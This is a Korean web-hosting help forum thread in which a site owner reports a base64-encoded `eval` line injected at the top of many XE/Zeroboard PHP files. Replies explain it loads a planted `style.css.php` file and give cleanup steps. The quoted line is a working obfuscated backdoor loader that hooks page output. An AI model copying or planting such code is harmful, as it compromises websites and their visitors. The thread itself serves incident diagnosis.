묻고답하기
php 파일속에 못보던 코드가 들어잇습니다. //**/eval(base64_decode(
2010.04.16 16:03
안녕하세요.
제로보드 기본 php 파일들 윗부분에 원본파일에 없는 코드들이 들어있습니다.
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpey
RHTE9CQUxTWydtZnNuJ109Jy9ob21lL2FudHRpbGUxL3B1YmxpY19odG1sL3hlL21vZHVsZXMvZWRpdG9yL2NvbXBvbmVudHMv
ZW1vdGljb24vdHBsL2ltYWdlcy9tc24vc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x
1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe
29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>
이런게 붙어 있던데 도대체 이게 뭘까요?
많은 파일속에 들어 있습니다.
해킹 같은게 아닌가 아주 걱정됩니다.
이게뭐고 제가 해야 할일이 뭔가요?
도데체 뭐때문 일까요?
댓글 2
-
행복한고니
2010.04.16 16:16
-
앙띠2
2010.04.16 16:34
감사합니다.
알려주신데로 검색해 보았으나 그 파일은 안보입니다.
주신 정보를 토대로 이 파일의 주소는 제가 전에 사용하였던 서버의 주소 이더군요.
호스팅회사랑 싸웠는데, 열받아서 모든 자료, 데이타 베이스를 모두 백업받아, 현재는 다른 호스팅을 사용 중입니다.
제 홈페이지의 모든 위젯,모듈 등등은 XE 사이트에서 받아서 사용한것들인데 XE 사이트를 신뢰하는 저로써는 호스팅 회사의 짓이 아닌가 싶습니다.
폴더 주소중
anttile1 라고 되어있는것이 현재는 다른곳입니다.
이것도 문제가 될까요?
시키신데로 모든 조치를 취하도록 하겟습니다.
제 컴퓨터에는 바이러스가 검출되지 않습니다. V3 Lite 로 검색 하엿습니다.
XE 파일을 새로 다운받아 다시 업로드 하였습니다.
FTP 주소는 이 코드가 전에 사용하던 호스팅 주소로 되어 있는데, 현재는 작동하지 않을 거 같은데, 그래도 바꿔보겠습니다.
아무래도 해킹이 맞을 것 같습니다. 위에서 만들어내는 코드는 다음과 같습니다.
실제로 위험한 부분은 올려주신 코드가 아니라 style.css.php라는 파일일 것입니다.
혹시나 싶어 확인해봤는데, 원래 존재하는 파일이 아니네요. 그 말인 즉, 어디선가 올바르지 않은 방법으로 이 파일을 업로드하거나 작성했다는 얘기가 됩니다.
보안 사고가 뭐 때문인지는 워낙 경우가 많아서 원인이 뭐라고 단정짓기는 어렵습니다.
여하튼 문제가 되는 파일을 재빨리 지운 후 보안 상황을 점검해보시는 것이 좋을 것 같습니다.
혹시 모르니 계정 백업도 해두시고요.
할 수 있는 일
1. 사용자 PC 상의 악성 코드가 문제일 확률이 있답니다. 본인 PC 바이러스 검사도 해보세요.
2. FTP, SSH의 계정 비밀 번호를 바꿉니다.
3. 사용자 홈 계정의 권한을 보세요. 기본은 755를 유지하되 xe/files에만 707 혹은 777을 허용합니다.